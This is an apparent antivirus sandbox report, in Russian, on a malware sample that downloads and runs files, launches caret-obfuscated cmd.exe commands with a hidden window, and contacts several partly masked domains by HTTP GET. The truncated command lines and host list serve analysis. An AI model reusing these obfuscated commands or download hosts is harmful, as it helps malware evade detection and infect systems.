Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c f^OR , ; /^f , " tokens= +2 delims=bL=f" ; %^g , , ^In ; ( , ; ' , ; ^^a^^SS^^oc ; ^| , FiNd^^s^^TR ; ; m^^d^^^= ' ; ) ; , d^O ; , %^g; , CzinbFI^/v^~_d^#fLzYS , , Q51E/^R...
Сетевая активность
Подключается к
- 'ne##zuk.org':80
- 'la###irade.net':80
- 'ja#####national.co.in':80
- 'is###ramera.se':80
- 'ec##in.fr':80
- 'ec##in.fr':443
TCP
Запросы HTTP GET
- http://ne##zuk.org/J
- http://la###irade.net/A
- http://ja#####national.co.in/Wu
- http://is###ramera.se/ss61rAf
- http://ec##in.fr/JGMeRn0v
Другие
- 'ec##in.fr':443
UDP
- DNS ASK ne##zuk.org
- DNS ASK la###irade.net
- DNS ASK ja#####national.co.in
- DNS ASK is###ramera.se
- DNS ASK ec##in.fr
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c f^OR , ; /^f , " tokens= +2 delims=bL=f" ; %^g , , ^In ; ( , ; ' , ; ^^a^^SS^^oc ; ^| , FiNd^^s^^TR ; ; m^^d^^^= ' ; ) ; , d^O ; , %^g; , CzinbFI^/v^~_d^#fLzYS , , Q51E/^R...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^a^SS^oc | FiNd^s^TR m^d^=
- '<SYSTEM32>\cmd.exe' /S /D /c" aSSoc "
- '<SYSTEM32>\findstr.exe' md=
- '<SYSTEM32>\cmd.exe' ; , CzinbFI/v~_d#fLzYS , , Q51E/R " ; (Se^t ^ ]^ =b.N,g1hyGkD^)iRZ^Mc/d u6f^+$^xFnp^\^(^s:^a0^@o}Bv^tCjJ^=AW^eT^{m^9lYrSz;^O'^Kw-P)&& , , ^For ; %^e ; ^In , (^ ; ^; ^ 28^ 3^6 ...
